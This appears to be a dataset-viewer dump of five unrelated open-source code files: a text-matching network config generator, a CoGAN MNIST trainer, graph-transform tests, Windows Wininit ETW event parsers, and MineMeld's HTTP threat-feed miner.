max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
script/aaai_match_arci_qa_rank.py | pl8787/textnet-release | 114 | 12687287 | #-*-coding:utf8-*-
import copy, os
from gen_conf_file import *
from dataset_cfg import *
def gen_match_lstm(d_mem, init, lr, dataset, l2, lstm_norm2):
# print "ORC: left & right lstm share parameters"
net = {}
ds = DatasetCfg(dataset)
g_filler = gen_uniform_filler_setting(init)
zero_filler = gen_zero_filler_setting()
g_updater = gen_adagrad_setting(lr = lr, l2 = l2, batch_size = ds.train_batch_size)
zero_l2_updater = gen_adagrad_setting(lr = lr, batch_size = ds.train_batch_size)
g_layer_setting = {}
g_layer_setting['no_bias'] = False
g_layer_setting['w_filler'] = g_filler
g_layer_setting['b_filler'] = zero_filler
g_layer_setting['w_updater'] = g_updater
g_layer_setting['b_updater'] = g_updater
net['net_name'] = 'match_arci'
net['need_reshape'] = True
net_cfg_train, net_cfg_valid, net_cfg_test = {}, {}, {}
net['net_config'] = [net_cfg_train, net_cfg_valid, net_cfg_test]
net_cfg_train["tag"] = "Train"
net_cfg_train["max_iters"] = ds.train_max_iters
net_cfg_train["display_interval"] = ds.train_display_interval
net_cfg_train["out_nodes"] = ['loss']
net_cfg_valid["tag"] = "Valid"
net_cfg_valid["max_iters"] = ds.valid_max_iters
net_cfg_valid["display_interval"] = ds.valid_display_interval
net_cfg_valid["out_nodes"] = ['P@k','MRR']
net_cfg_test["tag"] = "Test"
net_cfg_test["max_iters"] = ds.test_max_iters
net_cfg_test["display_interval"] = ds.test_display_interval
net_cfg_test["out_nodes"] = ['P@k', 'MRR']
layers = []
net['layers'] = layers
layer = {}
layers.append(layer)
layer['bottom_nodes'] = []
layer['top_nodes'] = ['x', 'y']
layer['layer_name'] = 'train_data'
layer['layer_type'] = 79
layer['tag'] = ['Train']
setting = {}
layer['setting'] = setting
setting['batch_size'] = ds.train_batch_size
setting['shuffle'] = True
setting['data_file'] = ds.train_data_file
setting['max_doc_len'] = ds.max_doc_len
setting['min_doc_len'] = ds.min_doc_len
layer = {}
layers.append(layer)
layer['bottom_nodes'] = []
layer['top_nodes'] = ['x', 'y']
layer['layer_name'] = 'valid_data'
layer['layer_type'] = 80
layer['tag'] = ['Valid']
setting = {}
layer['setting'] = setting
setting['data_file'] = ds.valid_data_file
setting['max_doc_len'] = ds.max_doc_len
setting['min_doc_len'] = ds.min_doc_len
layer = {}
layers.append(layer)
layer['bottom_nodes'] = []
layer['top_nodes'] = ['x', 'y']
layer['layer_name'] = 'test_data'
layer['layer_type'] = 80
layer['tag'] = ['Test']
setting = {}
layer['setting'] = setting
setting['data_file'] = ds.test_data_file
setting['max_doc_len'] = ds.max_doc_len
setting['min_doc_len'] = ds.min_doc_len
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['x']
layer['top_nodes'] = ['word_rep_seq']
layer['layer_name'] = 'embedding'
layer['layer_type'] = 21
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['embedding_file'] = ds.embedding_file
print "ORC: update all words"
# setting['update_indication_file'] = ds.update_indication_file
setting['feat_size'] = ds.d_word_rep
setting['word_count'] = ds.vocab_size
print "ORC: not use l2 for embedding"
setting['w_updater'] = zero_l2_updater
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['word_rep_seq']
layer['top_nodes'] = ['l_sentence', 'r_sentence']
layer['layer_name'] = 'sentence_split'
layer['layer_type'] = 20
setting = {}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence']
layer['top_nodes'] = ['l_sentence_conv_1']
layer['layer_name'] = 'l_conv_1'
layer['layer_type'] = 14
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['channel_out'] = d_mem
setting['kernel_x'] = ds.d_word_rep
setting['kernel_y'] = 3
setting['pad_x'] = 0
setting['pad_y'] = 2
setting['no_bias'] = True
setting['stride'] = 1
setting['d1_var_len'] = True
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_conv_1']
layer['top_nodes'] = ['l_sentence_conv_nonlinear_1']
layer['layer_name'] = 'l_conv_nonlinear_1'
layer['layer_type'] = 3
setting = {}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_conv_nonlinear_1']
layer['top_nodes'] = ['l_sentence_swap_1']
layer['layer_name'] = 'l_swap_1'
layer['layer_type'] = 42
setting = {'pass_len':True, 'pass_len_dim':1, 'axis1':1, 'axis2':3}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_swap_1', 'l_sentence']
layer['top_nodes'] = ['l_sentence_pool_1']
layer['layer_name'] = 'l_pool_1'
layer['layer_type'] = 10001
setting = {}
layer['setting'] = setting
setting['L'] = 2
setting['l'] = 1
setting['max_sentence_length'] = ds.max_doc_len
setting['min_rep_length'] = 4
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_pool_1']
layer['top_nodes'] = ['l_sentence_conv_2']
layer['layer_name'] = 'l_conv_2'
layer['layer_type'] = 14
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['channel_out'] = d_mem
setting['kernel_x'] = d_mem
setting['kernel_y'] = 3
setting['pad_x'] = 0
setting['pad_y'] = 2
setting['no_bias'] = True
setting['stride'] = 1
setting['d1_var_len'] = True
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_conv_2']
layer['top_nodes'] = ['l_sentence_conv_nonlinear_2']
layer['layer_name'] = 'l_conv_nonlinear_2'
layer['layer_type'] = 3
setting = {}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_conv_nonlinear_2']
layer['top_nodes'] = ['l_sentence_swap_2']
layer['layer_name'] = 'l_swap_2'
layer['layer_type'] = 42
setting = {'pass_len':True, 'pass_len_dim':1, 'axis1':1, 'axis2':3}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_swap_2', 'l_sentence']
layer['top_nodes'] = ['l_sentence_pool_2']
layer['layer_name'] = 'l_pool_2'
layer['layer_type'] = 10001
setting = {}
layer['setting'] = setting
setting['L'] = 2
setting['l'] = 2
setting['max_sentence_length'] = ds.max_doc_len
setting['min_rep_length'] = 4
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['l_sentence_pool_2']
# layer['top_nodes'] = ['l_sentence_conv_3']
# layer['layer_name'] = 'l_conv_3'
# layer['layer_type'] = 14
# setting = copy.deepcopy(g_layer_setting)
# layer['setting'] = setting
# setting['channel_out'] = d_mem
# setting['kernel_x'] = d_mem
# setting['kernel_y'] = 3
# setting['pad_x'] = 0
# setting['pad_y'] = 2
# setting['no_bias'] = True
# setting['stride'] = 1
# setting['d1_var_len'] = True
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['l_sentence_conv_3']
# layer['top_nodes'] = ['l_sentence_conv_nonlinear_3']
# layer['layer_name'] = 'l_conv_nonlinear_3'
# layer['layer_type'] = 3
# setting = {}
# layer['setting'] = setting
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['l_sentence_conv_nonlinear_3']
# layer['top_nodes'] = ['l_sentence_swap_3']
# layer['layer_name'] = 'l_swap_3'
# layer['layer_type'] = 42
# setting = {'pass_len':True, 'pass_len_dim':1, 'axis1':1, 'axis2':3}
# layer['setting'] = setting
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['l_sentence_swap_3', 'l_sentence']
# layer['top_nodes'] = ['l_sentence_pool_3']
# layer['layer_name'] = 'l_pool_3'
# layer['layer_type'] = 10001
# setting = {}
# layer['setting'] = setting
# setting['L'] = 3
# setting['l'] = 3
# setting['max_sentence_length'] = ds.max_doc_len
# setting['min_rep_length'] = 4
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence']
layer['top_nodes'] = ['r_sentence_conv_1']
layer['layer_name'] = 'r_conv_1'
layer['layer_type'] = 14
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['channel_out'] = d_mem
setting['kernel_x'] = ds.d_word_rep
setting['kernel_y'] = 3
setting['pad_x'] = 0
setting['pad_y'] = 2
setting['no_bias'] = True
setting['stride'] = 1
setting['d1_var_len'] = True
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_conv_1']
layer['top_nodes'] = ['r_sentence_conv_nonlinear_1']
layer['layer_name'] = 'r_conv_nonlinear_1'
layer['layer_type'] = 3
setting = {}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_conv_nonlinear_1']
layer['top_nodes'] = ['r_sentence_swap_1']
layer['layer_name'] = 'r_swap_1'
layer['layer_type'] = 42
setting = {'pass_len':True, 'pass_len_dim':1, 'axis1':1, 'axis2':3}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_swap_1', 'r_sentence']
layer['top_nodes'] = ['r_sentence_pool_1']
layer['layer_name'] = 'r_pool_1'
layer['layer_type'] = 10001
setting = {}
layer['setting'] = setting
setting['L'] = 2
setting['l'] = 1
setting['max_sentence_length'] = ds.max_doc_len
setting['min_rep_length'] = 4
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_pool_1']
layer['top_nodes'] = ['r_sentence_conv_2']
layer['layer_name'] = 'r_conv_2'
layer['layer_type'] = 14
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['channel_out'] = d_mem
setting['kernel_x'] = d_mem
setting['kernel_y'] = 3
setting['pad_x'] = 0
setting['pad_y'] = 2
setting['no_bias'] = True
setting['stride'] = 1
setting['d1_var_len'] = True
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_conv_2']
layer['top_nodes'] = ['r_sentence_conv_nonlinear_2']
layer['layer_name'] = 'r_conv_nonlinear_2'
layer['layer_type'] = 3
setting = {}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_conv_nonlinear_2']
layer['top_nodes'] = ['r_sentence_swap_2']
layer['layer_name'] = 'r_swap_2'
layer['layer_type'] = 42
setting = {'pass_len':True, 'pass_len_dim':1, 'axis1':1, 'axis2':3}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_swap_2', 'r_sentence']
layer['top_nodes'] = ['r_sentence_pool_2']
layer['layer_name'] = 'r_pool_2'
layer['layer_type'] = 10001
setting = {}
layer['setting'] = setting
setting['L'] = 2
setting['l'] = 2
setting['max_sentence_length'] = ds.max_doc_len
setting['min_rep_length'] = 4
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['r_sentence_pool_2']
# layer['top_nodes'] = ['r_sentence_conv_3']
# layer['layer_name'] = 'r_conv_3'
# layer['layer_type'] = 14
# setting = copy.deepcopy(g_layer_setting)
# layer['setting'] = setting
# setting['channel_out'] = d_mem
# setting['kernel_x'] = d_mem
# setting['kernel_y'] = 3
# setting['pad_x'] = 0
# setting['pad_y'] = 2
# setting['no_bias'] = True
# setting['stride'] = 1
# setting['d1_var_len'] = True
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['r_sentence_conv_3']
# layer['top_nodes'] = ['r_sentence_conv_nonlinear_3']
# layer['layer_name'] = 'r_conv_nonlinear_3'
# layer['layer_type'] = 3
# setting = {}
# layer['setting'] = setting
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['r_sentence_conv_nonlinear_3']
# layer['top_nodes'] = ['r_sentence_swap_3']
# layer['layer_name'] = 'r_swap_3'
# layer['layer_type'] = 42
# setting = {'pass_len':True, 'pass_len_dim':1, 'axis1':1, 'axis2':3}
# layer['setting'] = setting
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['r_sentence_swap_3', 'r_sentence']
# layer['top_nodes'] = ['r_sentence_pool_3']
# layer['layer_name'] = 'r_pool_3'
# layer['layer_type'] = 10001
# setting = {}
# layer['setting'] = setting
# setting['L'] = 3
# setting['l'] = 3
# setting['max_sentence_length'] = ds.max_doc_len
# setting['min_rep_length'] = 4
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_pool_2', 'r_sentence_pool_2']
layer['top_nodes'] = ['bi_sentence_rep']
layer['layer_name'] = 'concat'
layer['layer_type'] = 18
setting = {}
layer['setting'] = setting
setting['bottom_node_num'] = 2
setting['concat_dim_index'] = 3
setting['is_concat_by_length'] = False
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['bi_sentence_rep']
layer['top_nodes'] = ['hidden_trans']
layer['layer_name'] = 'mlp_hidden'
layer['layer_type'] = 11
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['num_hidden'] = d_mem * 4
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['hidden_trans']
layer['top_nodes'] = ['hidden_rep']
layer['layer_name'] = 'hidden_nonlinear'
layer['layer_type'] = 1
setting = {}
layer['setting'] = setting
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['hidden_rep']
# layer['top_nodes'] = ['hidden_drop_rep']
# layer['layer_name'] = 'dropout'
# layer['layer_type'] = 13
# ds.dp_rate = 0.
# print "ORC, dp rate:", ds.dp_rate
# setting = {'rate':ds.dp_rate}
# layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['hidden_rep']
# layer['bottom_nodes'] = ['dpool_rep']
layer['top_nodes'] = ['softmax_prob']
layer['layer_name'] = 'softmax_fullconnect'
layer['layer_type'] = 11
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['num_hidden'] = 1 # ds.num_class
# setting['no_bias'] = True
setting['w_filler'] = zero_filler
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['softmax_prob', 'y']
layer['top_nodes'] = ['loss']
# layer['layer_name'] = 'softmax_activation'
layer['layer_name'] = 'pair_hinge'
layer['layer_type'] = 55
layer['tag'] = ['Train']
setting = {}
layer['setting'] = setting
setting['delta'] = 1.
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['softmax_prob', 'y']
layer['top_nodes'] = ['P@k']
layer['layer_name'] = 'P@k_layer'
layer['layer_type'] = 61
layer['tag'] = ['Valid', 'Test']
setting = {'k':1, 'col':0, 'method':'P@k'}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['softmax_prob', 'y']
layer['top_nodes'] = ['MRR']
layer['layer_name'] = 'MRR_layer'
layer['layer_type'] = 61
layer['tag'] = ['Valid', 'Test']
setting = {'k':1, 'col':0, 'method':'MRR'}
layer['setting'] = setting
return net
run = 1
l2 = 0.
# for dataset in ['paper']:
for dataset in ['qa_top1k_4']:
for d_mem in [50]:
idx = 0
# for epoch_no in [0, 10000, 25000]:
for epoch_no in [0]:
for init in [0.3, 0.1, 0.03]:
for lr in [0.5, 0.3, 0.1, 0.03]:
# for l2 in [0.00001, 0.0001, 0.001]:
init_t = init
# t_lr = t_lr_mul * lr
pretrain_run_no = 0
lstm_norm2 = 100000
net = gen_match_lstm(d_mem=d_mem,init=init,lr=lr,dataset=dataset,l2=l2,lstm_norm2=lstm_norm2)
net['log'] = 'log.match.arci.{0}.d{1}.run{2}.{3}'.format\
(dataset, str(d_mem), str(run), str(idx))
# net["save_model"] = {"file_prefix": "./model/model."+str(idx),"save_interval": 500}
# net["save_activation"] = [{"tag":"Valid","file_prefix": \
# "./model/valid."+str(idx), \
# "save_interval": 500, \
# "save_nodes":["x","y","word_rep_seq","l_sentence",\
# "r_sentence","interaction_rep", \
# # "interaction_rep_nonlinear",\
# "dpool_rep","softmax_prob"], \
# "save_iter_num":1}]
gen_conf_file(net, '/home/wsx/exp/match/{0}/arci/run.{1}/'.format(dataset,str(run)) + \
'model.match.arci.{0}.d{1}.run{2}.{3}'.format\
(dataset, str(d_mem), str(run), str(idx)))
idx += 1
|
cogan_pytorch/src/trainer_gan_mnist.py | sagardsaxena/CoGAN | 285 | 12687299 | from torch.autograd import Variable
from net_gan_mnist import *
import torch
import torch.nn as nn
import numpy as np
from init import *
class MNISTGanTrainer(object):
def __init__(self, batch_size=64, latent_dims=100):
super(MNISTGanTrainer, self).__init__()
self.dis = Dis28x28()
self.gen = Gen28x28(latent_dims)
self.dis_opt = torch.optim.Adam(self.dis.parameters(), lr=0.0002, betas=(0.5, 0.999), weight_decay=0.0005)
self.gen_opt = torch.optim.Adam(self.gen.parameters(), lr=0.0002, betas=(0.5, 0.999), weight_decay=0.0005)
self.true_labels = Variable(torch.LongTensor(np.ones(batch_size, dtype=np.int)))
self.fake_labels = Variable(torch.LongTensor(np.zeros(batch_size, dtype=np.int)))
self.dis.apply(xavier_weights_init)
self.gen.apply(xavier_weights_init)
def cuda(self):
self.dis.cuda()
self.gen.cuda()
self.true_labels = self.true_labels.cuda()
self.fake_labels = self.fake_labels.cuda()
def dis_update(self, images, noise):
self.dis.zero_grad()
true_outputs = self.dis(images)
true_loss = nn.functional.cross_entropy(true_outputs, self.true_labels)
_, true_predicts = torch.max(true_outputs.data, 1)
true_acc = (true_predicts == 1).sum()/(1.0*true_predicts.size(0))
fake_images = self.gen(noise)
fake_outputs = self.dis(fake_images)
fake_loss = nn.functional.cross_entropy(fake_outputs, self.fake_labels)
_, fake_predicts = torch.max(fake_outputs.data, 1)
fake_acc = (fake_predicts == 0).sum() / (1.0 * fake_predicts.size(0))
d_loss = true_loss + fake_loss
d_loss.backward()
self.dis_opt.step()
return 0.5 * (true_acc + fake_acc)
def gen_update(self, noise):
self.gen.zero_grad()
fake_images = self.gen(noise)
fake_outputs = self.dis(fake_images)
fake_loss = nn.functional.cross_entropy(fake_outputs, self.true_labels)
fake_loss.backward()
self.gen_opt.step()
return fake_images
|
galileo/tests/test_transforms.py | YaoPu2021/galileo | 115 | 12687315 | <gh_stars>100-1000
# Copyright 2020 JD.com, Inc. Galileo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import pytest
import torch
import galileo.pytorch as gp
import tensorflow as tf
import galileo.tf as gt
from galileo.tests.utils import numpy_equal
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
# batch size=5 num nodes=10
# indices [5, 9]
fanouts = [2, 3]
indices = [
[2, 7, 4, 4, 2, 1, 3, 8, 1],
[8, 9, 2, 3, 6, 4, 4, 4, 0],
[4, 7, 1, 0, 1, 3, 0, 4, 1],
[4, 2, 6, 1, 5, 1, 4, 0, 5],
[3, 2, 2, 9, 8, 8, 0, 1, 7],
]
expect_no_sort = [
[
2, 8, 4, 4, 3, 2, 8, 4, 4, 3, 7, 9, 7, 2, 2, 7, 9, 7, 2, 2, 7, 9, 7, 2,
2, 4, 2, 1, 6, 2, 4, 2, 1, 6, 2, 4, 2, 1, 6, 2
],
[
7, 9, 7, 2, 2, 4, 2, 1, 6, 2, 4, 3, 0, 1, 9, 2, 6, 1, 5, 8, 1, 4, 3, 1,
8, 3, 4, 0, 4, 0, 8, 4, 4, 0, 1, 1, 0, 1, 5, 7
],
]
expect_sort = [
[
1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 4, 4, 4, 4, 4,
4, 4, 6, 6, 6, 7, 7, 7, 7, 7, 7, 8, 8, 9, 9, 9
],
[
0, 4, 1, 7, 4, 1, 9, 5, 8, 1, 8, 4, 0, 4, 1, 0, 7, 2, 2, 7, 2, 1, 6, 3,
8, 1, 4, 0, 5, 4, 0, 2, 1, 1, 3, 9, 2, 3, 6, 4
],
]
expect_target = [2, 8, 4, 4, 3]
@pytest.mark.parametrize('sort_indices', (False, True))
def test_relation_transform_tf(sort_indices):
rt = gt.RelationTransform(fanouts,
sort_indices=sort_indices,
sort_stable=True)
res = rt.transform(
dict(indices=tf.convert_to_tensor(indices),
edge_weight=tf.random.normal((5, 9))))
assert list(res.keys()) == [
'relation_indices',
'relation_weight',
'target_indices',
]
assert res['relation_indices'].shape == [2, 40]
expect = expect_sort if sort_indices else expect_no_sort
assert numpy_equal(res['relation_indices'].numpy(), expect)
assert res['relation_weight'].shape == [40, 1]
assert res['target_indices'].shape == [5]
assert numpy_equal(res['target_indices'].numpy(), expect_target)
@pytest.mark.parametrize('sort_indices', (False, True))
def test_relation_transform_pytorch(sort_indices):
rt = gp.RelationTransform(fanouts,
sort_indices=sort_indices,
sort_stable=True)
res = rt.transform(
dict(indices=torch.tensor(indices), edge_weight=torch.randn(5, 9)))
assert list(res.keys()) == [
'relation_indices',
'relation_weight',
'target_indices',
]
assert numpy_equal(res['relation_indices'].shape, [2, 40])
if sort_indices:
# sort is not stable in pytorch
assert numpy_equal(res['relation_indices'][0].numpy(), expect_sort[0])
else:
assert numpy_equal(res['relation_indices'].numpy(), expect_no_sort)
assert numpy_equal(res['relation_weight'].shape, [40, 1])
assert numpy_equal(res['target_indices'].shape, [5])
assert numpy_equal(res['target_indices'].numpy(), expect_target)
|
etl/parsers/etw/Microsoft_Windows_Wininit.py | IMULMUL/etl-parser | 104 | 12687331 | <filename>etl/parsers/etw/Microsoft_Windows_Wininit.py
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-Wininit
GUID : 206f6dea-d3c5-4d10-bc72-989f03c8b84b
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=9, version=0)
class Microsoft_Windows_Wininit_9_0(Etw):
pattern = Struct(
"Flags" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=10, version=0)
class Microsoft_Windows_Wininit_10_0(Etw):
pattern = Struct(
"Win32Status" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=11, version=0)
class Microsoft_Windows_Wininit_11_0(Etw):
pattern = Struct(
"StringCount" / Int32ul,
"String" / WString
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=12, version=0)
class Microsoft_Windows_Wininit_12_0(Etw):
pattern = Struct(
"Level" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=14, version=0)
class Microsoft_Windows_Wininit_14_0(Etw):
pattern = Struct(
"Config" / Int32ul,
"IsTestConfig" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=16, version=0)
class Microsoft_Windows_Wininit_16_0(Etw):
pattern = Struct(
"Level" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=17, version=0)
class Microsoft_Windows_Wininit_17_0(Etw):
pattern = Struct(
"Level" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=53, version=0)
class Microsoft_Windows_Wininit_53_0(Etw):
pattern = Struct(
"SessionId" / Int32ul,
"Flags" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=55, version=0)
class Microsoft_Windows_Wininit_55_0(Etw):
pattern = Struct(
"SessionId" / Int32ul,
"IsRemote" / Int32ul,
"GracePeriod" / Int32ul,
"Flags" / Int32ul,
"Reason" / Int32ul,
"Message" / WString
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=6001, version=0)
class Microsoft_Windows_Wininit_6001_0(Etw):
pattern = Struct(
"Flags" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=6002, version=1)
class Microsoft_Windows_Wininit_6002_1(Etw):
pattern = Struct(
"ShutdownFlags" / Int32ul,
"SystemShutdownDuration" / Int64ul,
"SkuHasLogoff" / Int32ul
)
|
minemeld/ft/http.py | zul126/minemeld-core | 147 | 12687338 | # Copyright 2015 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module implements minemeld.ft.http.HttpFT, the Miner node for plain
text feeds over HTTP/HTTPS.
"""
import requests
import logging
import re
import itertools
from minemeld import __version__ as MM_VERSION
from . import basepoller
LOG = logging.getLogger(__name__)
class HttpFT(basepoller.BasePollerFT):
"""Implements class for miners of plain text feeds over http/https.
**Config parameters**
:url: URL of the feed.
:polling_timeout: timeout of the polling request in seconds.
Default: 20
:verify_cert: boolean, if *true* feed HTTPS server certificate is
verified. Default: *true*
:user_agent: string, value for the User-Agent header in HTTP
request. If ``MineMeld``, MineMeld/<version> is used.
Default: python ``requests`` default.
:ignore_regex: Python regular expression for lines that should be
ignored. Default: *null*
:indicator: an *extraction dictionary* to extract the indicator from
the line. If *null*, the text until the first whitespace or newline
character is used as indicator. Default: *null*
:fields: a dicionary of *extraction dictionaries* to extract
additional attributes from each line. Default: {}
:encoding: encoding of the feed, if not UTF-8. See
``str.decode`` for options. Default: *null*, meaning do
nothing, (Assumes UTF-8).
**Extraction dictionary**
Extraction dictionaries contain the following keys:
:regex: Python regular expression for searching the text.
:transform: template to generate the final value from the result
of the regular expression. Default: the entire match of the regex
is used as extracted value.
See Python `re <https://docs.python.org/2/library/re.html>`_ module for
details about Python regular expressions and templates.
Example:
Example config in YAML where extraction dictionaries are used to
extract the indicator and additional fields::
url: https://www.dshield.org/block.txt
ignore_regex: "[#S].*"
indicator:
regex: '^([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\\t([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})'
transform: '\\1-\\2'
fields:
dshield_nattacks:
regex: '^.*\\t.*\\t[0-9]+\\t([0-9]+)'
transform: '\\1'
dshield_name:
regex: '^.*\\t.*\\t[0-9]+\\t[0-9]+\\t([^\\t]+)'
transform: '\\1'
dshield_country:
regex: '^.*\\t.*\\t[0-9]+\\t[0-9]+\\t[^\\t]+\\t([A-Z]+)'
transform: '\\1'
dshield_email:
regex: '^.*\\t.*\\t[0-9]+\\t[0-9]+\\t[^\\t]+\\t[A-Z]+\\t(\\S+)'
transform: '\\1'
Example config in YAML where the text in each line until the first
whitespace is used as indicator::
url: https://ransomwaretracker.abuse.ch/downloads/CW_C2_URLBL.txt
ignore_regex: '^#'
Args:
name (str): node name, should be unique inside the graph
chassis (object): parent chassis instance
config (dict): node config.
"""
def configure(self):
super(HttpFT, self).configure()
self.url = self.config.get('url', None)
self.polling_timeout = self.config.get('polling_timeout', 20)
self.verify_cert = self.config.get('verify_cert', True)
self.user_agent = self.config.get('user_agent', None)
self.encoding = self.config.get('encoding', None)
self.username = self.config.get('username', None)
self.password = self.config.get('password', None)
self.ignore_regex = self.config.get('ignore_regex', None)
if self.ignore_regex is not None:
self.ignore_regex = re.compile(self.ignore_regex)
self.indicator = self.config.get('indicator', None)
if self.indicator is not None:
if 'regex' in self.indicator:
self.indicator['regex'] = re.compile(self.indicator['regex'])
else:
raise ValueError('%s - indicator stanza should have a regex',
self.name)
if 'transform' not in self.indicator:
if self.indicator['regex'].groups > 0:
LOG.warning('%s - no transform string for indicator'
' but pattern contains groups',
self.name)
self.indicator['transform'] = '\g<0>'
self.fields = self.config.get('fields', {})
for f, fattrs in self.fields.iteritems():
if 'regex' in fattrs:
fattrs['regex'] = re.compile(fattrs['regex'])
else:
raise ValueError('%s - %s field does not have a regex',
self.name, f)
if 'transform' not in fattrs:
if fattrs['regex'].groups > 0:
LOG.warning('%s - no transform string for field %s'
' but pattern contains groups',
self.name, f)
fattrs['transform'] = '\g<0>'
def _process_item(self, line):
line = line.strip()
if not line:
return [[None, None]]
if self.indicator is None:
indicator = line.split()[0]
else:
indicator = self.indicator['regex'].search(line)
if indicator is None:
return [[None, None]]
indicator = indicator.expand(self.indicator['transform'])
attributes = {}
for f, fattrs in self.fields.iteritems():
m = fattrs['regex'].search(line)
if m is None:
continue
attributes[f] = m.expand(fattrs['transform'])
try:
i = int(attributes[f])
except:
pass
else:
attributes[f] = i
return [[indicator, attributes]]
def _build_iterator(self, now):
rkwargs = dict(
stream=True,
verify=self.verify_cert,
timeout=self.polling_timeout
)
if self.user_agent is not None:
if self.user_agent == 'MineMeld':
rkwargs['headers'] = {
'User-Agent': 'MineMeld/%s' % MM_VERSION
}
else:
rkwargs['headers'] = {
'User-Agent': self.user_agent
}
if self.username is not None and self.password is not None:
rkwargs['auth'] = (self.username, self.password)
r = requests.get(
self.url,
**rkwargs
)
try:
r.raise_for_status()
except:
LOG.debug('%s - exception in request: %s %s',
self.name, r.status_code, r.content)
raise
result = r.iter_lines()
if self.ignore_regex is not None:
result = itertools.ifilter(
lambda x: self.ignore_regex.match(x) is None,
result
)
if self.encoding is not None:
result = itertools.imap(
lambda x: x.decode(self.encoding).encode('utf_8'),
result
)
return result
|
